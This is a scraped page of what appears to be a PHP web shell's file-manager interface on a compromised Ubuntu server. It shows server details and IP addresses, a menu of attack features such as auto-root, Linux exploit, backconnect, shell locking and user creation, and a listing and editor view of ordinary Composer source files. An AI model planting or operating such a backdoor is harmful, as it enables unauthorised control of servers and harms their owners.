Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
php /
Composer /
DependencyResolver /
[ HOME SHELL ]
Name
Size
Permission
Action
Operation
[ DIR ]
drwxr-xr-x
Decisions.php
5.1
KB
-rw-r--r--
DefaultPolicy.php
9.12
KB
-rw-r--r--
GenericRule.php
2.12
KB
-rw-r--r--
PolicyInterface.php
746
B
-rw-r--r--
Pool.php
13.88
KB
-rw-r--r--
Problem.php
9.45
KB
-rw-r--r--
Request.php
1.91
KB
-rw-r--r--
Rule.php
8.99
KB
-rw-r--r--
Rule2Literals.php
2.44
KB
-rw-r--r--
RuleSet.php
4.06
KB
-rw-r--r--
RuleSetGenerator.php
12.41
KB
-rw-r--r--
RuleSetIterator.php
2.28
KB
-rw-r--r--
RuleWatchChain.php
1.37
KB
-rw-r--r--
RuleWatchGraph.php
5.2
KB
-rw-r--r--
RuleWatchNode.php
2.68
KB
-rw-r--r--
Solver.php
26.15
KB
-rw-r--r--
SolverBugException.php
757
B
-rw-r--r--
SolverProblemsException.php
2.69
KB
-rw-r--r--
Transaction.php
7.55
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Request.php
<?php /* * This file is part of Composer. * * (c) Nils Adermann <naderman@naderman.de> * Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Composer\DependencyResolver; use Composer\Semver\Constraint\ConstraintInterface; /** * @author Nils Adermann <naderman@naderman.de> */ class Request { protected $jobs; public function __construct() { $this->jobs = array(); } public function install($packageName, ConstraintInterface $constraint = null) { $this->addJob($packageName, 'install', $constraint); } public function update($packageName, ConstraintInterface $constraint = null) { $this->addJob($packageName, 'update', $constraint); } public function remove($packageName, ConstraintInterface $constraint = null) { $this->addJob($packageName, 'remove', $constraint); } /** * Mark an existing package as being installed and having to remain installed * * These jobs will not be tempered with by the solver * * @param string $packageName * @param ConstraintInterface|null $constraint */ public function fix($packageName, ConstraintInterface $constraint = null) { $this->addJob($packageName, 'install', $constraint, true); } protected function addJob($packageName, $cmd, ConstraintInterface $constraint = null, $fixed = false) { $packageName = strtolower($packageName); $this->jobs[] = array( 'cmd' => $cmd, 'packageName' => $packageName, 'constraint' => $constraint, 'fixed' => $fixed, ); } public function updateAll() { $this->jobs[] = array('cmd' => 'update-all'); } public function getJobs() { return $this->jobs; } }
Close